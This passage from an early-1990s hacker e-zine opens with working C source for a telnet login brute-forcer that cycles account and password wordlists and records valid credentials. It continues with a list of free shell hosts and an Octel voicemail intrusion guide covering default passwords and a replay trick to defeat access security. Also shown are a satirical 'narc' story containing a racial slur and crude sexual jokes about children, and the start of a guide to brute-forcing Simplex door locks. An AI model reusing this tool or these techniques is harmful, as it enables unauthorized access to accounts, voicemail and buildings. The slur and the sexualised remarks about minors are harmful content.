  826.                     printf("AccountList: ");
  827.                     gets(afilename);
  828.         }
  829.             while (!pfilename[0]) {
  830.                     printf("PasswrdList: ");
  831.                     gets(pfilename);
  832.         }
  833.             while (!ofilename[0]) {
  834.                     printf("Outfile: ");
  835.                     gets(ofilename);
  836.         }
  837.             printf("\nHOST: %s", HOST);
  838.             printf("\nAccountFile: %s", afilename);
  839.             printf("\nPasswrdFile: %s", pfilename);
  840.             printf("\nOutfile: %s", ofilename);
  841.             printf("\nDebug: ");
  842.             if (DBUG == 0)
  843.                 printf("Off");
  844.         else
  845.                 printf("On");
  846.             printf("\n");
  847.             strcpy(buf, HOST);
  848.             strcpy(HOST, "open ");
  849.             strcat(HOST, buf);
  850.             strcat(HOST, "\n");
  851.             printf(HOST);
  852.             if (DBUG == 0) {
  853.                     if (fork()) {
  854.                             printf("\nRunning in the background. ");
  855.                             exit();
  856.                 }
  857.                     printf("PID: %d\n", getpid());
  858.         }
  859.             signal(SIGCLD, death);           /* Execute death function when child dies */
  860.  
  861. /*
  862. #######################################
  863. # Set up pipes and start telnet child #
  864. #######################################
  865. */
  866.             if (pipe(p2) == -1 || pipe(p1) == -1) {
  867.                     printf("Error making pipes.=n");
  868.                     return;
  869.         }
  870.             readfd = p1[0];  /* read from p1 */
  871.             writefd = p2[1]; /* write to p2 */
  872.             switch (fork()) {
  873.             case -1 :
  874.                 printf("Couldnt fork off a child\n");
  875.                     return;
  876.             case 0 :  /* the child */
  877.                     dup2(p2[0], 0);  /* read from p2 */
  878.                     dup2(p1[1], 1);  /* write to p1 */
  879.                     execl(TELNETPATH, "telnet", 0);
  880.                     printf("Exec failed.\n");
  881.                     exit(-1);
  882.             default:  /* parent */
  883.                     break;
  884.         }
  885.  
  886. /*
  887. ##############
  888. # Open files #
  889. ##############
  890. */
  891.             if ((accounts = fopen(afilename, "r")) == NULL) {
  892.                     printf("ERROR: AccountFile <%s> Not found.\n", afilename);
  893.                     exit();
  894.         }
  895.             if ((passwords = fopen(pfilename, "r")) == NULL) {
  896.                     printf("ERROR: PasswrdFile <%s> Not Found.\n", pfilename);
  897.                     exit();
  898.         }
  899.             found = fopen(ofilename, "w+");
  900.             fprintf(found, "Trying Host: %s\n\n", buf);
  901.             fflush(found);
  902.             PUTS(HOST);  /* Send open <host> to telnet */
  903.  
  904.             while (1) {                /* Loop to capture to buf */
  905.                     if (GETC(ch) > 0) {
  906.                             if (DBUG == 1)
  907.                                 putchar(ch);
  908.                             buf[count++] = ch;
  909.                 }
  910.  
  911.                    if (ch == 10)
  912.                         count = 0;
  913.  
  914.                     if (strstr(buf, GOTONESTRING) != NULL) {    /* Check for good account */
  915.                             count = 0;
  916.                             fprintf(found, "Account: %sPassword: %s\n", account, password);
  917.                             fflush(found);
  918.                             printf("Got one!   Account: %sPassword:%s\n", account, password);
  919.                             if (EOO == 1)
  920.                                 exit();
  921.                 }
  922.                     if (strstr(buf, LOGINSTRING) != NULL) {     /* Check for login prompt */
  923.                             count = 0;
  924.                             strcpy(buf, "XXXXXXXX");
  925.                             if (ftell(passwords) == 0) {
  926.                                     if (fscanf(accounts, "%s", account) == EOF) {
  927.                                             printf("End of accounts\n");
  928.                                             break;
  929.                                 }
  930.                                     strcat(account, "\n");
  931.                         }
  932.  
  933.                             if (DBUG == 1)
  934.                                 puts(account);
  935.                             PUTS(account);
  936.                 }
  937.  
  938.                     if (strstr(buf, PASSSTRING) != NULL) {    /* Check for passwd prompt */
  939.                             count = 0;
  940.                             strcpy(buf, "XXXXXX");
  941.                             if (fscanf(passwords, "%s", password) == EOF) {
  942.                                     strcpy(password, account);
  943.                                     rewind(passwords);
  944.                         }
  945.                             else
  946.                                 strcat(password, "\n");
  947.                             if (DBUG == 1)
  948.                                 puts(password);
  949.                             PUTS(password);
  950.                 }
  951.  
  952.         }
  953.  
  954. }
  955.  
  956.  
  957. Sites That give you shell accounts for free.
  958. -----------------------------------------------
  959.  
  960. These are the only ones I know of offhand that you can telnet to and get free
  961. accounts.
  962.  
  963. axposf.pa.dec.com          login: axpguest  pass: <enter>
  964. cyberspace.org
  965. cyberspace.net
  966. cyberspace.com
  967. cybernet.cse.fau.edu (not shell, but has alot of other nice things.)
  968. cris.com
  969. delphi.com (well, you know, that 5 hours of free internet deal.)
  970. nyx.cs.du.edu              login: new
  971. hermes.merit.edu           login: um-m-net
  972. m-net.ann-arbor.mi.us      login: newuser
  973.  
  974.  
  975. If anyone wants to update, or make this t-phile more informational than it
  976. already is, email roach@tmok.res.wpi.edu.
  977.  
  978.  
  979. ==============================================================================
  980.  
  981.                           -=- The Empire Times -=-
  982.                        Volume 2, Issue 4, File 4 of 8
  983.                             The Octel VMB System
  984.                                by Da TelcoPimp
  985.  
  986. ++-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-++
  987. ||                                                                         ||
  988. ||        /--------/ /--------/ /-------------/ /----------/ /-/           ||
  989. ||       / /----/ / / /---/  / /-----+ +-----/ / /----/___/ / /            ||
  990. ||      / /    / / / /   /__/       / /       / +---/      / /             ||
  991. ||     / /    / / / /              / /       / +---/      / /              ||
  992. ||    / /____/ / / /___/---/      / /       / /____/---/ / /____/---/      ||
  993. ||   /________/ /_________/      /_/       /__________/ /__________/       ||
  994. ||                                                                         ||
  995. || k|LLa ak-aSKi by Shadowdancer da TelC()PiMP                             ||
  996. ++-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-++
  997.  
  998.  
  999.   Octel is a type of VMB system, like Meridian Mail or Audix or whatever.  But
  1000. Octel is not well known and I have recently been abusing these systems in my
  1001. area.  There is one thing that I have noticed about these systems, they have
  1002. very good security.  All this inpho was gotten from Octel Voice Information
  1003. Processing manual Release 3.0, a woman who works for Northern Telecom and
  1004. playing around on systems. So let this voyage into the world of the Octel VMB
  1005. system begin.  Ignore all spelling errors, I cant spel worth shit.  Format
  1006. for this file is: each section that begins with the # symbol means that
  1007. that is one of the options from the Main menu, and everything under that
  1008. will take you down levels..
  1009.  
  1010.  
  1011. Dialups:
  1012. ========
  1013.  
  1014.   There are two dialups for this system.  There is the backdoor, the Octel
  1015. System number, and then there is the front door.  The Backdoor can be used to
  1016. leave messages and also login to the vmb.  This also goes for the front door
  1017. as well.  The differnece between the front door and the backdoor is the
  1018. greeting.  The front door is where you get the personalized greeting.  The
  1019. backdoor will pick up and say something to the effect of enter the mailbox
  1020. number you wish to leave a message to or press # to indicate that you have
  1021. a mailbox on this system.
  1022.  
  1023. Hacking:
  1024. ========
  1025.  
  1026.   There is really not much to this part.  I have encountered an octel system
  1027. backdoor where the box number was the same as the password.  I have also
  1028. encountered a system where the password was the whole telephone number plus a
  1029. 1 before it such as the box number was 1234 and the password was 1(pre)1234.
  1030. These are all just basic defaults but they are what I have encountered more
  1031. frequently.
  1032.  
  1033.  
  1034. What to do after Logging in:
  1035. ============================
  1036.  
  1037.   After you have logged in, before you are brought up to the main menu, you
  1038. may be given some messages about different things maybe a broadcast message
  1039. from your sysadmin or notification of automatically deleted messages etc.
  1040.  
  1041.   Here is a list of options you can use at the main menu:
  1042.  
  1043. #1. Message Review
  1044. ------------------
  1045.  
  1046.    11: To hear new messages.
  1047.          This option plays all new messages since the last session.
  1048.  
  1049.     1: To review all messages.
  1050.          This allows you to play all messages in your mailbox, in the order
  1051.          recieved.
  1052.  
  1053.     4: Replay.
  1054.          After listening to a message you are able to hit 4 and replay that
  1055.          last message.  Commands used during playback will be listed at the
  1056.          end of this section.
  1057.  
  1058.     5: Get Envelope information.
  1059.          Envelope iformation basically gives you the specs on a message.  It
  1060.          will tell you whether it came from someone who has a mailbox on that
  1061.          system or whether it came from and outside caller.  It will tell you
  1062.          the date & time sent, how long it is and if the message is marked as
  1063.          private, urgent or both.
  1064.  
  1065.     6: Send a copy.
  1066.          Press 6 and then you will be prompted to make a recording of comments
  1067.          for the message so that the person the message is being forwarded to
  1068.          knows that it is a forwarded message from you.  After recording the
  1069.          comments press #.  If you would like to review your comments press 1.
  1070.          Now you enter the mailbox or if you don't know that press # to dial 
  1071.          by name.
  1072.  
  1073.     7: Erase.
  1074.          Just what it says.  It erases the message after you listen to the
  1075.          message.  
  1076.     
  1077.     8: Reply.
  1078.          After you press 8 record your reply and then press # to tell the
  1079.          system you are done recording and then press # again to send.  You 
  1080.          can use record/edit controls during your reply.  These will be 
  1081.          covered later in the text.
  1082.  
  1083.     9: Save.
  1084.          Just as it says.  This option archives your messages. 
  1085.  
  1086.     #: Skip a message.
  1087.          While you are listening to the new messages you can press # to skip
  1088.          them but after you listen to the new messages it plays your skipped
  1089.          messages over and then your archived messages.
  1090.  
  1091.    ##: Skip to archived messages.
  1092.          If you are listening to the new messages and you want to skip to the
  1093.          archived messages just hit ## and you will be taken to them.
  1094.  
  1095.     *: Cancel review of messages.
  1096.          This option cancels message review and takes you back to the main 
  1097.          menu.
  1098.  
  1099.         Commands used during playback of messages
  1100.         -----------------------------------------
  1101.                  
  1102.                  1: Rewinds message 10 seconds.
  1103.  
  1104.                 11: Rewinds to the begining of the message.
  1105.  
  1106.                  2: Pause.  To unpause press 2 again.
  1107.  
  1108.                  3: Fast-forwards message 10 seconds.
  1109.  
  1110.                 33: Fast-forwards to the end of the message.
  1111.  
  1112.                  4: Plays the message slower.
  1113.  
  1114.                  5: Gives envelope information.
  1115.  
  1116.                  6: Plays the message faster.
  1117.  
  1118.                  8: Levels volume to normal level.
  1119.  
  1120.                  9: Increases volume.
  1121.  
  1122. #2. Sending messages to other subscribers on the system                                     
  1123. -------------------------------------------------------
  1124.  
  1125.   This function of the vmb is quite useful to the actual users of the system.
  1126. Once someone has recieved there messages and read them etc.  They can then
  1127. send a message to someother person on that same system without having to dial
  1128. their front door.  Here are the options that are used during the recording
  1129. and after the recording of the message.
  1130.          
  1131.     #: Stop recording once you are satisfied with the message.
  1132.  
  1133.     1: Replay your message.
  1134.  
  1135.     *: Re-record your message if you are not satisfied with it.
  1136.          When re-recording you can re-record the whole message or just part 
  1137.          of it.  Use the Recording controls which will be listed later on
  1138.          in the text.  (NOTE If you are leaving a long message the system 
  1139.          notify you with two beeps that tell you your time is almost up.)
  1140.  
  1141.   Once you have finished recording your message you have the choice of 
  1142. re-recording the message or delivering it.  There are several ways of 
  1143. selecting a destination.  1) box number.  2) subscribers name.  3) group
  1144. or personal distrubution list.  4) a guest or home mailbox number.  (NOTE
  1145. Later on in the text we will discuss how to create distribution lists and
  1146. guest and home mailboxes.)  When you are going to give the name of the
  1147. person, instead of the mailbox number, here is the format for entering in
  1148. the name -- last, first. 
  1149.          0=0
  1150.          1=1
  1151.          2=2,a,b, or c
  1152.          3=3,d,e, or f
  1153.          4=4,g,h, or i
  1154.          5=5,j,k, or l
  1155.          6=6,m,n, or o
  1156.          7=7,p,q,r, or s
  1157.          8=8,t,u, or v
  1158.          9=9,w,x,y, or z
  1159.  
  1160.          For instance, I was on the same system as you, you could send it to 
  1161.          PiMP,Telco = 746783526
  1162.  
  1163.   You can mark the messages as either urgentor private. After you enter the 
  1164. destination and before you send the message is when you can mark the message.
  1165. You can always cancel the the option by pressing the option number a second
  1166. time.
  1167.  
  1168.     1: Private.
  1169.  
  1170.     2: Urgent.
  1171.  
  1172.   If you select message conformation you will presented with two choices.
  1173. conformation of receipt and notification of non-receipt.  Conformation of
  1174. receipt is a system generated message which is sent to you after the person
  1175. has read your message.  Notification of non-receipt is a system generated 
  1176. message that tells you that the subscriber has not listened to your message
  1177. within a certain time frame.  
  1178.  
  1179.     1: Conformation of receipt.
  1180.  
  1181.     2: Notification of non-receipt.
  1182.  
  1183.   If you wanted to you could give the system a certain time to deliver the 
  1184. message.  This function is known as Future Delivery.  
  1185.  
  1186.     4: Future delivery.
  1187.  
  1188.   After selecting this option you will be prompted to enter a date.  You can
  1189. either enter the actual date or if the message is to be delivered within the
  1190. week you can specify the day of the week.  
  1191.  
  1192.     1: Specify the date.
  1193.        -Select the month. Jan.= 1 and Sept.= 9.
  1194.        -Select the date.  Between 1 and 31.
  1195.        -Set the hour and minutes.  7:00 = 700 and 12:30 = 1230.
  1196.        -Select 1 for a.m. or 2 for p.m.
  1197.  
  1198.     2: Specify the day of the week.
  1199.        -Enter the first two letter of the day, using the chart above that
  1200.         was used to enter in the name of the person on the system.  
  1201.         Sun.= 78 and Fri.= 37.
  1202.        -Select the hour and minutes using the same format above.
  1203.        -Select the time of day, a.m. or p.m., using the format above.
  1204.  
  1205.   After selecting all of the options and getting everything squared away, you
  1206. are now ready to send the message.  Press # to do this.  After this enter *
  1207. to go back to the main menu.
  1208.  
  1209.         Recording controls
  1210.         ------------------
  1211.  
  1212.                  Recording controls are basically identical to playback 
  1213.                  controls used while listening to messages.  There are only
  1214.                  a few commands that are different.  
  1215.  
  1216.                  5: Resume the recording of a message.
  1217.  
  1218.                  1: Edit message.
  1219.  
  1220.                 11: Listen to what has been recorded.
  1221.  
  1222.                  2: Pause.  Then press 5 to re-record over the undesired part
  1223.                     of the message.
  1224.  
  1225. #3. Check Receipt
  1226. -----------------
  1227.  
  1228.   After you have entered this section from the main menu by pressing 3 you
  1229. will be asked the identify the subscriber's mailbox number or enter in their
  1230. name.  All this option does is tell you whether or not the person you sent 
  1231. mail to has listened to your mail or not.  If they have not listened to your
  1232. mail all the way you will not get the receipt.  The system will playback
  1233. every message the subscriber has not listened to.  To skip the messages you
  1234. can press # or press * to cancel the Check Receipt.
  1235.  
  1236. #4. Personal Options
  1237. --------------------
  1238.  
  1239.   Under this section in the main menu there are 6 options you can choose from.
  1240. 1) Notification On/Off. 2) Administrative options. 3) Greetings. 4) 
  1241. Notification schedule. 5) Mailbox forwarding. & 6)Security Options. (g00d13)
  1242. There are many levels of menus to this part of the main menu.  But don't 
  1243. worry Jane Octel will talk you throught all of the steps...:)
  1244.  
  1245.     1: Notification On/Off.
  1246.          This option basically sets whether system messages are repeated or
  1247.          not.  1 = On, 2 = Off.
  1248.  
  1249.     2: Administrative options. (Under this level you have many many choices)
  1250.          
  1251.        1: Passwords.  
  1252.          
  1253.          1: Personal Password.
  1254.               Your personal password can be up to 15 digits long.  Your 
  1255.               sysadmin set what is the minimum length required.  Do not forget
  1256.               your password because then the sysadmin is forced to kill that
  1257.               mailbox and start you up a new one.  The sysadmin will not be a 
  1258.               happy camper.  But then again sysadmins can eat a dick right?
  1259.          
  1260.          2: Home Password.
  1261.               This is just some password you can give to members in your 
  1262.               family.  This just lets them send and receive mail like a guest.
  1263.  
  1264.         3&4: Guest Password.
  1265.               This is one of the coolest options of all.  This is basically
  1266.               a mailbox within a mailbox.  You designate a password to one of
  1267.               your friends and he can leave messages to you and you can leave 
  1268.               messages to him.  But other users on the system cannot send the
  1269.               guest mail.  
  1270.               
  1271.          5: Security Password.
  1272.               This allows someone the option of getting the envelope 
  1273.               information for the messages in your mailbox.
  1274.  
  1275.        2: Group Lists (NOTE You can have a maximum of 15 lists with a maximum
  1276.           of 25 mailboxes).
  1277.          
  1278.          1: Create list.
  1279.             -Give a two digit number for the list you want to create(from
  1280.              11 to 25).
  1281.             -Record the name for the list like "Uhh cool asswipes".
  1282.             -Enter either the mailbox number or the name of the people you
  1283.              want on the list.
  1284.             -To review all the names on the list press 1.
  1285.             -To exit and save the list press *.
  1286.  
  1287.   When you want to send a message to a distribution list, enter in the list 
  1288. number when you are prompted to enter in the destination after recording the
  1289. message etc.
  1290.           
  1291.          2: Edit existing lists.
  1292.  
  1293.          3: Delete existing lists.
  1294.  
  1295.          4: Review or rename lists.
  1296.  
  1297.        3: Prompt levels.
  1298.             These are the message prompts.  It is like setting up menus on
  1299.             a bbs.  You can choose novice, skilled, expert.  This is not
  1300.             unlike setting up menus to your liking.
  1301.          
  1302.          1: Standard prompts.
  1303.               These prompts are your basic prompts wich go over basic options  
  1304.               such as sending mail etc.
  1305.  
  1306.          2: Extended prompts.
  1307.               This prompt gives thorough explanations of commands and prompts
  1308.               you for use of all features.
  1309.  
  1310.          3: Rapid prompts.
  1311.               This prompts cover all features but do not give thorough details
  1312.               and explanations.
  1313.  
  1314.        4: Date and Time playback.
  1315.             This option tells you the time the message was recieved.  You 
  1316.             can turn this on by hitting 1 for on or 2 for off.
  1317.          
  1318.     3: Greetings.
  1319.  
  1320.        1: Personal greeting.
  1321.             This is the greeting you get once you have called up the front 
  1322.             door or you have been transfered to that vmb.  It is basically
  1323.             the same for almost all vmbs.  You enter in a message like "Uhh
  1324.             this is Da TelcoPiMP, leave a fucking message after the beep!!"
  1325.             You can also choose a standard greeting wich is the Jane Octel
  1326.             voice saying that so and so is not in right now.
  1327.        
  1328.        2: Extended absence greeting.
  1329.             This greeting just says that you are out for a lengthy period
  1330.             of time and won't be checking messages frequently.  If the 
  1331.             Message block option is on when the extended absence greeting
  1332.             is on your mailbox will not except messages except for messages
  1333.             from the sysadmin.
  1334.  
  1335.        3: Name recording.
  1336.             This is a recording of your name which is used to confirm 
  1337.             mailboxes when someone has entered in the number of your mailbox.
  1338.             It is also used with the standard greeting.
  1339.  
  1340.     4: Notification schedule.
  1341.          This function allows your mailbox to call you at certain times (the 
  1342.          times you setup) give you messages.
  1343.          -Select 1 for first schedule 2 for second schedule or 3 for temporary
  1344.           schedule.  
  1345.          -Enter the telephone you want the system to call you at.
  1346.          -You will be asked to set up a start/stop time for the outcall
  1347.           notification from your mailbox.  You can specify whether it applys
  1348.           to weekdays, weekends or both.  Enter in the time using the same
  1349.           format as the earlier commands that require you to enter in the 
  1350.           time.
  1351.          -Select the type of message that activates the notification.  1 = All,
  1352.           2 = Urgent and 3 = Group List.
  1353.          -Select how soon you want the system to call you after it receives a
  1354.           new message.  1 = Hour, 2 = Hours, 3 = 4 hours, 4 = 1 day, 5 = 
  1355.           immediately and 6 = Never.
  1356.          -After all of this hassle you can confirm your entries or listen 
  1357.          again.  1 = Confirm and 2 = Listen again.
  1358.  
  1359.     5: Mailbox forwarding. (NOTE To have this option work you must have 
  1360.     another mailbox created by the sysadmin, for the forwarded messages.  
  1361.     Call up the system where the mailbox has been created for you and set it 
  1362.     up.)
  1363.  
  1364.        1: Establish or change the forwarding destination.
  1365.             Enter the network node address? and the forwarding destination
  1366.             mailbox number.
  1367.  
  1368.        2: Cancel mailbox forwarding.
  1369.  
  1370.        #: Confirmation.
  1371.  
  1372.     6: Security options. (huhuhuhuh k00l)
  1373.  
  1374.        1: Turn on access sekurity. (Record your name and the time.)
  1375.  
  1376.        2: Turn off access sekurity.
  1377.  
  1378.   Ok alittle inpho on this option.  Once access security is on you are asked 
  1379. to record your name and time.  This is so that the next time you login to
  1380. your vmb you will hear "The last mailbox access was by <your name> at <time
  1381. of entry>."  So the next time you login to the vmb you will hear that message
  1382. if you recorded the inpho at the begining of the last login.  If you didn't
  1383. record any inpho you will hear silence.  Ok say you break into a system and
  1384. this option is on.  You will have to record that inpho.  But the thing is you
  1385. don't know if the person recorded inpho the last time they accessed their vmb.
  1386. Therefore you are screwed.  AHAH.  Solution.  Login.  Record the inpho.  Then
  1387. you will hear whether or not they recorded any inpho last time they were on. 
  1388. Grab your cool crystal clear sounding tape recorder and record their inpho
  1389. as they give it.  And then login to the vmb again but this time playback the
  1390. recording.  It may work it may not.  It all depends on the user of the system.
  1391.  
  1392.  
  1393. Conclusion:
  1394. -----------
  1395.  
  1396.   This phile gives you most of the inphormation you need to mess with an OCTEL
  1397. VMB once you are inside.  I didn't give any elite inpho like how to dialout or
  1398. anything you have to find that out yourself.  Also you can dial through an
  1399. attendant.  This system can be used to set up 800 meetme's (so can Meridian)
  1400. etc.  This system is just as good as Meridian Mail maybe even better oh well.
  1401.  
  1402. Some cool inpho.
  1403.  
  1404.   Octel Communications Corporations
  1405.   890 Tasman Drive
  1406.   Milpitas, California USA 95035-7439
  1407.   (408)/321-2000
  1408.  
  1409. greets:
  1410. -------
  1411.  
  1412. armitage: this shit g0es to y00r d0m3.
  1413. dr. freeze: y0y0y0y0 Dr. Fr33z3 in da hauz.
  1414. manowar: uh Hello this is Black Menstraul and I'd like the #5ESS dialups for
  1415.          my area so I can take over Bell Atlantic.
  1416. chaos: gimmie root on your system d00d.
  1417. r0ach: ypsnarf them passwords.
  1418. every_other_mother_fucka_i_didn't_mention: shouts go out to all yall mofo's.
  1419.  
  1420. L8R
  1421. Shadowdancer Da TelcoPimp
  1422.  
  1423. ==============================================================================
  1424.  
  1425.                           -=- The Empire Times -=-
  1426.                        Volume 2, Issue 4, File 5 of 8
  1427.                             My Life as a Narc...
  1428.                                  by Noelle
  1429.  
  1430. Introduction
  1431.  
  1432.  
  1433.         It all started one bright sunny May morning.  May 30th, 1993, to
  1434. be exact.
  1435.  
  1436.         There I was, sitting at my computer terminal innocently playing
  1437. TrekMuse and TinyTim Mush.  Little did I know how much trouble I was about
  1438. to get into.
  1439.  
  1440.         I saw something in the reflection of my X-terminal, so I turned
  1441. around.  Standing behind me was a Fed!  My heart stopped for a moment, then
  1442. began to pound furiously.  "Hello?"
  1443.  
  1444.         The man was tall, about 6', with dark brown hair and piercing blue
  1445. eyes.  "Agent Snorkel, Air Force OSI.  Can I speak with you for a few
  1446. moments?"  I noticed his reflective sunglasses and long black trench coat,
  1447. and had memories of something written by Tom Clancy.
  1448.  
  1449.         "Uh..."  I looked around for my boss, "Sure.  I guess."  My boss was
  1450. probably off reading another one of his molecular biology textbooks.
  1451.  
  1452.         We walked out to the center courtyard of the Pentagon.  It was a
  1453. windy day, so Agent Snorkel had to keep brushing his hair out of his eyes.
  1454. We sat down on one of the benches and he pulled out his badge.  "We're
  1455. required by law to show you this."  Before I could even read the name on the
  1456. gold blob, he shoved it back inside his pocket.  Opening up his dayplanner,
  1457. he proceeded to ask me several questions about the internet and cyberspacial
  1458. adventures.
  1459.  
  1460.         I responded with enthusiasm.  "MUSH programming is a great way to
  1461. learn C code!"  He looked at me with an expression that said, "C code?" and
  1462. I knew I was safe.  "Yes, I learn so much more about how to do my job by
  1463. playing these games.  If only EVERYONE had this opportunity!"  Agent Snorkel
  1464. nodded and made a few chicken scratches on a pad of paper.
  1465.  
  1466.         My mistake was in giving the guy too much information.  I could see
  1467. a glimmer in his eyes when I said, "Oh yeah...these guys would do anything
  1468. to impress a girl on the net.  They've told me about all SORTS of things
  1469. they've done which are probably against the law.  Hacking into a computer is
  1470. illegal, isn't it?"
  1471.  
  1472.         And so began my illustrious career as a narc.
  1473.  
  1474.  
  1475. Part 1
  1476.  
  1477.  
  1478.         Not everyone is lucky enough to be considered worthy of posing as a
  1479. hacker.  And certainly not many females!  However, lieing is a skill I've
  1480. honed since childhood, when I used to do all sorts of things I wasn't
  1481. supposed to, and came up with a new and believable story on the spur of the
  1482. moment every single time!
  1483.  
  1484.         I'm sure my appearance had something to do with it.  Who wouldn't
  1485. believe that a 21-year-old girl with blonde hair and green eyes was a hacker?
  1486. Especially one who had a top secret security clearance in the Pentagon.  I
  1487. tell you, those hackers were not easily fooled!  It was tough to resist the
  1488. urge to show up at the 2600 meetings in DC wearing my glasses and sweatpants,
  1489. smoking and guzzling beer, setting a styrofoam cup or two on fire.  Yet
  1490. somehow, I found the inner strength required to act completely normal in the
  1491. presence of these fashion gurus and trend setters.
  1492.  
  1493.         That's another thing, speaking of urges that were hard to resist.  I
  1494. was having fantasies about all of them.  It was all I could do not to rip off
  1495. my clothing and throw myself on the first 12-year-old who came within ten
  1496. feet of me.  Instead, I had to pretend that I was attracted to the older
  1497. hackers - what a drag!
  1498.  
  1499.         Oh yeah, and the .gif's.  I had to pretend that the papers I carried
  1500. around with me had something to do with coding, or UNIX, when actually all
  1501. they were, were listings of my pornographic .gif collection.  It was quite
  1502. a treat to have hidden cameras ALL OVER MY APARTMENT, if you catch my drift.
  1503. To this day, I keep those photos in a secret safe behind my couch.  I'm
  1504. waiting to release them when I'll be able to get top dollar.  I've been told
  1505. that the photo of Okinawa with the horse will bring a particularly high
  1506. price, but that's just between you and me.
  1507.  
  1508.  
  1509. Part 2
  1510.  
  1511.  
  1512.         So you're probably wondering what exactly those slimy Feds wanted?
  1513. Well, I'm gonna tell you that part now.
  1514.  
  1515.         First off, we monitored IRC around the clock.  You guessed it!
  1516. Nothing quite surpasses a Sunday night with a pot of coffee and a few
  1517. gigabytes of meaningful chatter.  It's no wonder that students today spend
  1518. so much time on IRC; it's such a learning experience.  You can learn about
  1519. anything, from anatomy, to what's the latest in your local hardware store,
  1520. and maybe even the current jeopardy score if you're REALLY paying attention.
  1521. And the strong friendships that come about as a result of IRC, let's not
  1522. forget those.  Nothing beats a friend who cares about you so much that he
  1523. makes a couple thousand copies of your email to send to his closest friends.
  1524.  
  1525.         Secondly, we dissected each and every usenet post on groups like
  1526. alt.2600.  We were surprised to find a secret code in each and every message!
  1527. Some would even spell out satanic messages when you printed them backwards.
  1528. Try it, you'll see what I mean.  Incredible stuff.  We kept an updated
  1529. listing of who posted the most and on what topic, and of course the hot list
  1530. helped.  Anyone who posted something including words like "bomb", "missile",
  1531. "assassinate", or "federal" was immediately placed under surveillance.  We
  1532. sure know how to get the most out of the taxpayer's dollar!
  1533.  
  1534.         We also taped all the 2600 meetings.  It was a heck of a lot of fun
  1535. to squeeze ourselves into the potted plants.  No spandex for us, oh no!  We
  1536. made sure that we dressed in ceremonial robes of ambassadors so we wouldn't
  1537. stand out.  You know how observant those hackers are!  We have all sorts
  1538. of incriminating evidence on tape, from people actually talking to C-Curve
  1539. (oh, I thought you knew that was against the law), to Dr. Freeze wrapping
  1540. anyone within arms reach in a bear hug.  The worst was when some kids tried
  1541. to give away boxes of chocolate chip cookies.  Those boys are gonna do some
  1542. HARD TIME for that, I tell you.
  1543.  
  1544.  
  1545. Part 3
  1546.  
  1547.  
  1548.         Now, onto the part that people always ask about.  Who's going to
  1549. jail?
  1550.  
  1551.         Let me first profile Supernigger.  This guy is quite a piece of work.
  1552. So confident!  So...pale?
  1553.  
  1554.         His main mistake was having a fit of anger and deciding to cut off
  1555. my phone line when there were Fed-types in my apartment.  Boy did they love
  1556. to hear me scream at him when he called to explain what had happened!
  1557.  
  1558.         What we have on him is a tape of him stealing a pack of bubble gum
  1559. from the 7-11 by his house.  It was pure detective work setting it up, right
  1560. down to the little camera hidden in the earring of the cashier.  We could
  1561. tell he didn't suspect anything.  And why would he?  He's never been in
  1562. trouble before, so he has no reason to be paranoid!
  1563.  
  1564.         Then there's KL.  Yes, the guy who's on the cover of that hacker
  1565. book, the one who's got something pulled over most of his face.  That's to
  1566. hide the mark he had on his chin from being hit with the dart of a nerf gun.
  1567. Some weird story, something that happened to him at UUNET.  We never did
  1568. manage to get all the details, even though we had KL tied to a chair for
  1569. two days.  He's pretty good under those million kilowatt bulbs!
  1570.  
  1571.         Anyways, we caught KL using a scanner to listen in on the phone
  1572. conversations of his neighbors.  Yep, he was planning on blackmailing his
  1573. neighbors and using the money to pay off his legal bills.  We caught him
  1574. red-handed though, and he's agreed to help us out in the future...if you
  1575. know what I mean...you never know when we might need him to help us spy
  1576. on our bosses or the local FBI office.
  1577.  
  1578.         Not to be forgotten is that John guy.  This was a little harder
  1579. because this is a man who would NEVER break the law.  He even puts ME to
  1580. shame!  But, being brilliantly trained investigators, we soon discovered the
  1581. meaning behind his handle, "Laughing Gas".
  1582.  
  1583.         Mr. Lgas' claim to fame is being the local hitman for the DC crowd.
  1584. Yep, whenever someone can't get their revenge through hacking or phreaking,
  1585. they go to John.  John's most famous elimination procedure is shattering
  1586. someone's head with the front of his car.  His bumpers must be made of STEEL
  1587. or something!  Luckily, we only witnessed ten or eleven *SPLATS* before we
  1588. cuffed him and brought him in to be tortured...err, questioned.  He responded
  1589. to our questions with peals of laughter, so we had him committed.  The latest
  1590. news from the institution is that he keeps asking for internet access.  Sad.
  1591.  
  1592.         Last but not least is the man we all know and love, the Wing.  Did
  1593. anyone ever figure out his handle?  Nope, we don't know.  The way we figure
  1594. it is if you subtract his age from the year of his birth, then multiply that
  1595. by 666, and add that to the sum of his name in hexadecimal, it will give
  1596. you the IP address to a super top secret military base.  We're still checking
  1597. on that, because it may have something to do with UFO's.  A young man by the
  1598. name of Chris Goggans helped us with that little tidbit of information.  What
  1599. a helpful young man, always trying to do what's right and NEVER thinking only
  1600. of himself!
  1601.  
  1602.         At any rate, the last I heard, the Wing is planning on giving
  1603. interviews and writing a couple books about the trial that never was.
  1604. Because, come to think of it, we don't have anything on him.  But it sure
  1605. makes a good story to make people think we do!  Anything to keep the IRC
  1606. hackers talking, and talking, and talking (dang, you'd think by now they'd
  1607. have forgotten who I was, but NO!  to this day, my name appears at least a
  1608. million times in all of our IRC logs...I guess there's nothing else to talk
  1609. about, now that every operating system on the internet is secure).
  1610.  
  1611.         That's all for now folks.
  1612.  
  1613.                                 THE END
  1614.  
  1615.  
  1616. ==============================================================================
  1617.  
  1618.                           -=- The Empire Times -=-
  1619.                        Volume 2, Issue 4, File 6 of 8
  1620.                          How to Hack Simplex Locks
  1621.                                  by erudite
  1622.  
  1623.                                Simplex Locks.
  1624.                       Complete Listing & Hacking Theory
  1625.  
  1626. Simple(x) Description:
  1627.  
  1628.         A Simplex lock is one of those door locks with the 5 push buttons
  1629.         and a 3 digit  code.  There are a lot of these  type locks in the
  1630.         pentagon, (not high access, but for a little added security) and,
  1631.         in many many office buildings..
  1632.         Okay, Simplex locks are very easy to hack, now think that you can
  1633.         not use the same # twice in a row,  since it's already pushed in,
  1634.         and you can't have the same # twice in one code, because the # is
  1635.         already  registered.  So that would leave 5 options for the first
  1636.         selection, 4 for the 2nd selection, (you can't do 2 in a row) and
  1637.         3 left for your last selection (since you can't use 2 of the same
  1638.         # in a combo) so that is 5X4X3 which is = to 60. I needed to hack
